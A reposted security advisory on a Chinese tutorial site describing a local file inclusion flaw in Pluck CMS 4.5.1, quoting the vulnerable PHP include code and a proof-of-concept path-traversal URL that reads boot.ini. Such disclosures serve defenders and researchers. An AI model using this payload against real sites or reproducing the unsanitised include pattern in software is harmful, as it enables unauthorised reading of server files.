• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only) ,其中包含Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only) 等知识点,遇到此问题的同学们可以参考下
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Pluck Local File inclusion
# Vendor: http://www.pluck-cms.org
# Bug: Local File Inclusion
# Vulnerable Version: 4.5.1 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
###################################################################
####################
- Description:
#################### Pluck is a content management system, written in php.
####################
- Vulnerability:
#################### --> Local File Inclusion Input passed to multiple parameters in "predefined_variables.php" are not properly verified
before being used to include files.
This can be exploited to include arbitrary files from local resources. Code Snippet:
/data/inc/themes/predefined_variables.php #line:15-38 //Include Translation data
include ("data/settings/langpref.php");
include ("data/inc/lang/$langpref");
//Get Site-title
$sitetitle = file_get_contents("data/settings/title.dat"); //Get the page-data
$filetoread = $_GET['file'];
$album = $_GET['album'];
$blogpost = $_GET['blogpost'];
$cat = $_GET['cat']; if (($filetoread) && (file_exists("data/content/$filetoread"))) {
include "data/content/$filetoread"; } elseif ($album) {
$title = $album; } elseif ($blogpost) {
include("data/blog/$cat/posts/$blogpost"); } elseif ((!file_exists("data/content/$filetoread")) && (!$album) && (!$blogpost)) {
$title = $lang_front1;
$content = $lang_front2; }
POC: http://localhost/pluck-4_5_1/data/inc/themes/predefined_variables.php?blogpost=../../../../../../../../boot.ini ####################
- Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.comz
</div>

您可能想查找下面的文章:

相关文章

  • NoName Script
  • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
  • Simple PHP Blog (SPHPBlog)
  • CJ Ultra Plus
  • Maian Weblog
  • HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit
  • MS Internet Explorer (FTP Server Response) DoS Exploit
  • Poppler
  • Debian Sarge Multiple IMAP Server Denial of Service Exploit
  • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • AuraCMS
    • e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit
    • Maian Uploader
    • Maian Guestbook
    • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
    • Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
    • Linux Kernel
    • iGaming CMS
    • Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
    • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有